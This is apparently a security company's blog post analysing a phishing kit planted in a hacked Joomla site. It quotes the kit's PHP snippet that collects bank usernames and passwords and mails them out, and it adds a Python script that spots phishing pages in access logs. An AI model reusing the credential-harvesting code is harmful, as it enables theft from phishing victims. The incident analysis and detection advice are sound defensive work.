Last week we were called to fix a Joomla site that was infected by malware and disabled by their hosting company. The user forwarded the email he received:
Your account was reported to us by Google for malicious content and has been deactivated.
We ran a search on your account for the content that was reported and found files that contained malicious code. We created a text file that lists the files that we found the malicious code in and put it in your home directory; the file is called malware.txt. This file is not actually infected, it is an actual list of the problem files on your account based on Google’s report. Please keep in mind that we cannot guarantee that this is a complete list of every possible issue that your account has, it is a list of what we found based on Google’s report.
Nothing really unusual as we see this many times a day.
However, after some analysis of the site, we found a directory that didn’t look quite right. It was called “chase” and was inside another hidden directory called “.webservices”…
When we looked at the content, it had 3 files:
$ ls .webservices/chase
The index.php was similar to the login page for Chase, and asked for the user/pass of the person accessing it:
The difference is that the form was sending the user/pass to a login.php script (instead of Chase). Inside the login.php file it was emailing the user/pass to firstname.lastname@example.org and email@example.com:
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");
$user1 = $_POST['UserID'];
$pass1 = $_POST['Password'];
$subj = "CHASE $ip";
$msg = "Chase Info\n\nUsername: $user1\nPassword: $pass1\n———————————–\n Created By Lom\n———————————–";
$from = "From:
mail("$chaseme", $subj, $msg, $from);
Very nasty. We looked at all the logs and saw quite a few clicks onto this fraudulent page. Unfortunately, some people were compromised by this malicious phishing attempt.
Not sure it can ever be completely stopped, but why not reduce the risk? We definitely recommend that you check your logs more often. One area to analyze is all of the references to images being loaded. In this case study we’re able to conclude that the images and the CSS files used in the phishing attempt were being loaded directly from the Chase site. If the victim was analyzing their logs, they could have detected it a lot sooner.
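The log check described above, as an added example that is not code from the original post: it reads the access log of the site serving the images and CSS, counts asset requests whose Referer is a page on someone else's host, and ranks referers that sit inside a dot-prefixed directory (like .webservices) first. It assumes the Apache/nginx "combined" log format; the host names, addresses and log lines are constructed placeholders.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache/nginx "combined" format: ip - user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
ASSET_EXT = (".png", ".gif", ".jpg", ".jpeg", ".css", ".ico", ".svg")

def foreign_asset_referers(lines, own_hosts):
    """Count static-asset hits per referring page that is not on one of our hosts."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or not m["path"].split("?", 1)[0].lower().endswith(ASSET_EXT):
            continue  # unparsable line, or not an image/CSS request
        try:
            ref = urlsplit(m["referer"])
            host = (ref.hostname or "").lower()
        except ValueError:
            continue  # malformed Referer header
        if not host or any(host == h or host.endswith("." + h) for h in own_hosts):
            continue  # no Referer, or one of our own pages
        hits[f"{ref.scheme}://{host}{ref.path}"] += 1
    return hits

def has_hidden_segment(url):
    """True if a path segment starts with a dot, like the .webservices directory above."""
    return any(seg.startswith(".") for seg in urlsplit(url).path.split("/"))

def triage(lines, own_hosts):
    """Return (referer, hits, hidden_dir) rows, hidden-directory referers first."""
    rows = [(u, n, has_hidden_segment(u)) for u, n in foreign_asset_referers(lines, own_hosts).items()]
    return sorted(rows, key=lambda r: (not r[2], -r[1], r[0]))

# Constructed sample log; hosts and addresses are placeholders, not data from the incident.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2024:10:00:01 +0000] "GET /img/logo.gif HTTP/1.1" 200 2326 "https://www.bank.example/login" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2024:10:02:11 +0000] "GET /img/logo.gif HTTP/1.1" 200 2326 "http://hacked-site.example/.webservices/chase/index.php" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2024:10:02:11 +0000] "GET /css/login.css?v=3 HTTP/1.1" 200 5120 "http://hacked-site.example/.webservices/chase/index.php" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jan/2024:10:05:40 +0000] "GET /img/logo.gif HTTP/1.1" 200 2326 "https://news.example/article" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Jan/2024:10:06:02 +0000] "GET /img/logo.gif HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for url, n, hidden in triage(SAMPLE_LOG, ("bank.example",)):
        print(f"{n:4d}  hidden_dir={hidden}  {url}")
```

Ordinary hotlinking (the news.example row) also shows up here, so the hidden-directory flag and a referer path that names your own brand are what move a row to the top of the review list.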
All you webmasters and site owners out there: Keep your sites updated, use good passwords and monitor your sites!
As always, if you need help to recover from web attacks, or need someone to monitor your web site for these issues, visit http://sucuri.net, or just send us an email at firstname.lastname@example.org.